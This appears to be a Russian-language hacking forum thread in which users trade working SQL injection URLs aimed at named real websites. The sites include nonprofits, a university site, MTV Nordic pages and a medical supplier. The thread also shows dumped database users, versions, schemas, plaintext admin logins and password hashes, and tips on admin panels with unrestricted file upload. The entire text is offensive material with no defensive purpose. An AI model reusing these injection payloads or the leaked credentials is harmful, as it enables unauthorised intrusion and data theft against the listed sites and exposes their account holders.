PR 5 PR 4 рутовая запись.. finish him!!! PR 4 рутовая запись... Finish him!!! PR 4 file_priv нету PR 3 file_priv нет PR 3 file_priv нет, в базе ничего интересного нету PR 2 file_priv нету
gisTy И так .. начнём ! webmaster:taterdome Webmaster:RbgJxoUvwG7qk steve;peanut ===================================================== http://www.thegenesisgroup.org/calendar/event_info.php?eventid=-16+union+select+1,2,convert(concat_ws(0x3a,user,password,host),binary),4,null,6,7+from+mysql.user/* доступ рутовый без пароля .. но только с локалхоста и прилогоющих
Code: http://www.globalwaterfoundation.org/news.php?id=-1+union+select+1,concat_ws(0x3a,database(),0x3a,user(),0x3a,version()),3/* Помогите раскрутить доконца globalwaterfoundation_org_-_1 [email protected] 5.0.37-community-log Code: http://www.ewb-usa.org/news.php?ID=-1+order+by+1/* Code: http://www.english-zone.com/index.php?ID=-1' Code: http://musicsclub.com/index.php?id=-1+union+select+1,2,3,4/* Code: http://www.velostyle.com.ua/index.php?id=-1'
version: 5.0.22-log user: [email protected] database: ohl ============================================= version: 4.0.27-log user: [email protected] database: modest?hash ============================================= version: 4.0.27-nt-log user: [email protected] database: worldchallenge =============================================
PR 4 version(): 4.1.22 user(): braintea_btuser@localhost database(): braintea_btcom PR 3 Version(): 4.1.22-standard User(): jocuriha_stefan@localhost Database(): jocuriha_stefan@localhost PR 3 Version(): 4.1.22-standard User(): allriddl_allridd@localhost Database(): allriddl_allriddles
Pr6: mel.org Code: http://mel.org/SPT--BrowseResources.php?ParentId=748+union+select+111,222,333,444,555,user(),777,888,999-- www.grow.arizona.edu Code: http://www.grow.arizona.edu/SPT--BrowseResources.php?ParentId=291+union+select+1,2,3,4,5,user(),7,8,9-- www.wildscreenfestival.org Code: http://www.wildscreenfestival.org/index.php?pageid=-303+union+select+1,2,3,concat(username,0x3a,user_password),user(),6,7+from+phpbb_users--&parentid=257 Code: http://www.wildscreenfestival.org/index.php?pageid=-303+union+select+1,2,3,concat(table_schema,0x3a,table_name,0x3a,column_name),5,6,7+from+information_schema.columns--&parentid=257 Pr5: www.festivalofnature.org Code: http://www.festivalofnature.org/festival.php?pageid=-3+union+select+1,2,3,4,concat(table_schema,0x3a,table_name,0x3a,column_name,0x3c62722f3e),6,7+from+information_schema.columns--&parentid=0
www.zonemedical.com.au http://www.zonemedical.com.au/product_details.php?pid=-121+UNION+SELECT+1,2,CONCAT_WS(0x3A3a,username,password),4,5,6,7,8+FROM+users+limit+0,1/* 5.0.45-community Code: 18:brands 18:--1:id 18:--2:name 19:categories 19:--1:id 19:--2:name 20:file_types 20:--1:id 20:--2:name 21:files 21:--1:id 21:--2:file_type_id 21:--3:file_name 21:--4:file_size 21:--5:file_description 21:--6:product_id 21:--7:category_id 21:--8:primary_photo 21:--9:user_type_0 21:--10:user_type_2 21:--11:user_type_3 21:--12:user_type_4 22:products 22:--1:id 22:--2:category_id 22:--3:brand_id 22:--4:name 22:--5:product_code 22:--6:description 22:--7:serial_no_format 22:--8:active 22:--9:cashback 23:sections 23:--1:id 23:--2:name 23:--3:content 23:--4:width 24:users 24:--1:id 24:--2:user_type_id 24:--3:username 24:--4:password 24:--5:description Логинимся с главной под админом: zonemedical:zone001
4.1.20-standard-log caffetime_ro_caffe caffetime@localhost zione_evoluzione | 5.0.45-community zione_titziano@localhost Code: http://www.evoluzione.ro/news.php?id=-1+union+select+1,2,database(),user(),5,6,version()/*
http://www.companyhealth.co.uk/display.php?pageid=-2+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database())/* user()=companyh@localhost: version()=4.1.20
4-я версия, но стоблцы стандартные http://www.mantoncommunityalliance.org.uk/news/details.php?id=28'+union+select+concat_ws(0x3a,password,email,username)+from+users+limit+0,1/* ну и как обчно админка тоже стандартная: http://www.mantoncommunityalliance.org.uk/admin/ есть возможность заливать файлы (ява скрипт отрубаете, и заливаете любые файлы - не только jpg,gif,png) единственное что не нашел-дира куда заливается темповый файл ----------------------- http://www.community.oleary.pe.ca/news.cfm?id=-1+union+select+1,username,password,4+from+users login/pass в открытом виде: bshaw o859leary вот и админка: http://www.community.oleary.pe.ca/admin/ ------------------------ http://www.suncal.com/community/?id=1+and+1=2+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.tables+limit+58,1/* 5.0.45-community-nt suncalc_edit@localhost админка по стандарту, логин и пасс админа смотреть не стал - пошел спать
mtv.se Code: http://www.mtv.se/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111,concat_ws(0x3a,version(),user(),database()),3333,4444/*&ArticleId=4845 mtve.com Code: http://www.mtve.com/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111,concat_ws(0x3a,version(),user(),database()),3333,4444/*&ArticleId=4845 mtv.no Code: http://www.mtv.no/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111,concat_ws(0x3a,version(),user(),database()),3333,4444/*&ArticleId=4845 mtv.dk Code: http://www.mtv.dk/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111,concat_ws(0x3a,version(),user(),database()),3333,4444/*&ArticleId=4845 musictelevision.fi Code: http://www.musictelevision.fi/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111,concat_ws(0x3a,version(),user(),database()),3333,4444/*&ArticleId=4845 ко всем одно 5.0.37-log:[email protected]:mtvnordic
admin:adminpass admin:25e4ee4e9229397b6b17776bfceaf8e7:adminpass admin:indigovaldas кароче там очень много всего можно найти .. лень .. основное есть .. там только 60 табл в которых есть колонка password
